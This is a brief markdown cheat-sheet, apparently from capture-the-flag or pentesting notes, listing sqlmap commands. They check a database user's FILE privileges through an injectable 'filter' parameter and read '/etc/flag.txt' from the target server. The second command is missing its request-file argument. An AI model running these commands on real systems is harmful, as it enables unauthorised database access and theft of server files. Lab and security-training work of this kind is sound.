# sqlmap

```
// slqmap has the parameter
confirm the user has 'FILE' privileges to read files
sqlmap -r sql-request -p filter --current-user --privileges

read a file
sqlmap -r --file-read="/etc/flag.txt"
```